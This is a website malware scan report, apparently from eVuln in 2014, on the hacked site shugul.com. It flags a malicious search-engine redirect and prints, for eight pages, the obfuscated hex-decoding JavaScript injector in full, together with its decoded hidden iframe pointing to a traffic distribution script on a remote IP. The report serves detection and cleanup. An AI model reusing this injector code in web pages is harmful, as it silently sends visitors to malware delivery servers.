Malware Scanner report for shugul.com

Malicious/Suspicious/Total urls checked: 8/0/33

8 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://padovarisorse.it/mambots/search/search.php
154 websites infected.

The website "shugul.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://www.shugul.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.shugul.com Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 28 Sep 2014 05:36:24 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://www.shugul.com/	200 OK Content-Length: 25942 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/js/main.js	200 OK Content-Length: 14232 Content-Type: application/x-javascript	clean
http://www.shugul.com/js/noclick.js	200 OK Content-Length: 624 Content-Type: application/x-javascript	clean
http://www.shugul.com/company/index.html	200 OK Content-Length: 10185 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51859fef0a50c(v51859fef0a554){ function v51859fef0a598 () {return 16;} return(parseInt(v51859fef0a554,v51859fef0a598()));}function v51859fef0a651(v51859fef0a695){ function v51859fef0a771 () {var v51859fef0a7b1=2; return v51859fef0a7b1;} var v51859fef0a6dc='';for(v51859fef0a727=0; v51859fef0a727<v51859fef0a695.length; v51859fef0a727+=v51859fef0a771()){ v51859fef0a6dc+=(String.fromCharCode(v51859fef0a50c(v51859fef0a695.substr(v51859fef0a727, v51859fef0a771()))));}return v51859fef0a6dc;} document.write(v51859fef0a651('3C696672616D65206E616D653D27623362303427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3331206865696768743D3930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='b3b04' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=31 height=90 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/company/../js/main.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:26 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://padovarisorse.it/mambots/search/search.php	200 OK Content-Length: 186 Content-Type: text/html	clean
http://padovarisorse.it/test404page.js	404 Not Found Content-Length: 1635 Content-Type: text/html	clean
http://connect.facebook.net/en_US/all.js	200 OK Content-Length: 163644 Content-Type: application/x-javascript	clean
http://www.shugul.com/company/../js/noclick.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:27 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/portfolio/index.html	200 OK Content-Length: 11843 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51859ffa2dd08(v51859ffa2dd5a){ function v51859ffa2dd97 () {var v51859ffa2dde5=16; return v51859ffa2dde5;} return(parseInt(v51859ffa2dd5a,v51859ffa2dd97()));}function v51859ffa2de7b(v51859ffa2dec9){ var v51859ffa2dfb8=2; var v51859ffa2df17='';for(v51859ffa2df69=0; v51859ffa2df69<v51859ffa2dec9.length; v51859ffa2df69+=v51859ffa2dfb8){ v51859ffa2df17+=(String.fromCharCode(v51859ffa2dd08(v51859ffa2dec9.substr(v51859ffa2df69, v51859ffa2dfb8))));}return v51859ffa2df17;} document.write(v51859ffa2de7b('3C696672616D65206E616D653D2738333533393427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353034206865696768743D353034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='835394' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=504 height=504 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/portfolio/../js/main.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/portfolio/../js/noclick.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/about.html	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/services/index.html	200 OK Content-Length: 21109 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51859ffd1584e(v51859ffd15893){ var v51859ffd1592e=16; return(parseInt(v51859ffd15893,v51859ffd1592e));}function v51859ffd159e8(v51859ffd15a4b){ var v51859ffd15c82=2; var v51859ffd15a9a='';for(v51859ffd15b26=0; v51859ffd15b26<v51859ffd15a4b.length; v51859ffd15b26+=v51859ffd15c82){ v51859ffd15a9a+=(String.fromCharCode(v51859ffd1584e(v51859ffd15a4b.substr(v51859ffd15b26, v51859ffd15c82))));}return v51859ffd15a9a;} document.write(v51859ffd159e8('3C696672616D65206E616D653D2761626433333230323733366127207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353931206865696768743D3230207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='abd33202736a' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=591 height=20 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/services/../js/main.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/services/../js/dhtmlwindow.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/services/../js/noclick.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/whitepapers/index.html	200 OK Content-Length: 14369 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51865da38fafd(v51865da38fb47){ var v51865da38fb8e=16; return(parseInt(v51865da38fb47,v51865da38fb8e));}function v51865da38fc15(v51865da38fc56){ var v51865da38fc98='';for(v51865da38fcd9=0; v51865da38fcd9<v51865da38fc56.length; v51865da38fcd9+=2){ v51865da38fc98+=(String.fromCharCode(v51865da38fafd(v51865da38fc56.substr(v51865da38fcd9, 2))));}return v51865da38fc98;} document.write(v51865da38fc15('3C696672616D65206E616D653D27386332306327207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353536206865696768743D3237207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='8c20c' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=556 height=27 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/whitepapers/../js/main.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/whitepapers/../js/dhtmlwindow.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/whitepapers/../js/noclick.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/newsletter/index.html	200 OK Content-Length: 13473 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51859ff699a30(v51859ff699a70){ var v51859ff699ab3=16; return(parseInt(v51859ff699a70,v51859ff699ab3));}function v51859ff699b59(v51859ff699b99){ function v51859ff699c57 () {return 2;} var v51859ff699bd8='';for(v51859ff699c16=0; v51859ff699c16<v51859ff699b99.length; v51859ff699c16+=v51859ff699c57()){ v51859ff699bd8+=(String.fromCharCode(v51859ff699a30(v51859ff699b99.substr(v51859ff699c16, v51859ff699c57()))));}return v51859ff699bd8;} document.write(v51859ff699b59('3C696672616D65206E616D653D27623227207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3639206865696768743D333134207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='b2' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=69 height=314 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/newsletter/../js/main.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/newsletter/../js/noclick.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/forward/index.html	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/choice.html	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/tools/index.html	200 OK Content-Length: 14034 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51865d9fd92a0(v51865d9fd92f4){ return(parseInt(v51865d9fd92f4,16));}function v51865d9fd9428(v51865d9fd946c){ var v51865d9fd953a=2; var v51865d9fd94b2='';for(v51865d9fd94f5=0; v51865d9fd94f5<v51865d9fd946c.length; v51865d9fd94f5+=v51865d9fd953a){ v51865d9fd94b2+=(String.fromCharCode(v51865d9fd92a0(v51865d9fd946c.substr(v51865d9fd94f5, v51865d9fd953a))));}return v51865d9fd94b2;} document.write(v51865d9fd9428('3C696672616D65206E616D653D2733623627207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3534206865696768743D333033207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='3b6' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=54 height=303 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)
http://www.shugul.com/tools/../js/main.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/tools/../js/dhtmlwindow.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2.asp?partner=netweather&tStyle=normal&logo=1&zipcode=AFR\|SD\|SU005\|KHARTOUM\|&lang=uke&size=9&theme=&metric=1&target=_self	200 OK Content-Length: 8331 Content-Type: text/javascript	clean
http://www.shugul.com/tools/../js/noclick.js	HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:31 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1	clean
http://www.shugul.com/contacts.html	200 OK Content-Length: 11644 Content-Type: text/html	clean
http://www.shugul.com/index.html	200 OK Content-Length: 25942 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe> Antivirus reports: Ikarus Trojan.IframeRef McAfee-GW-Edition Heuristic.LooksLike.HTML.Infected.B VIPRE Heur.HTML.MalIFrame (v)

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=shugul.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://shugul.com/

Result: shugul.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for shugul.com

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools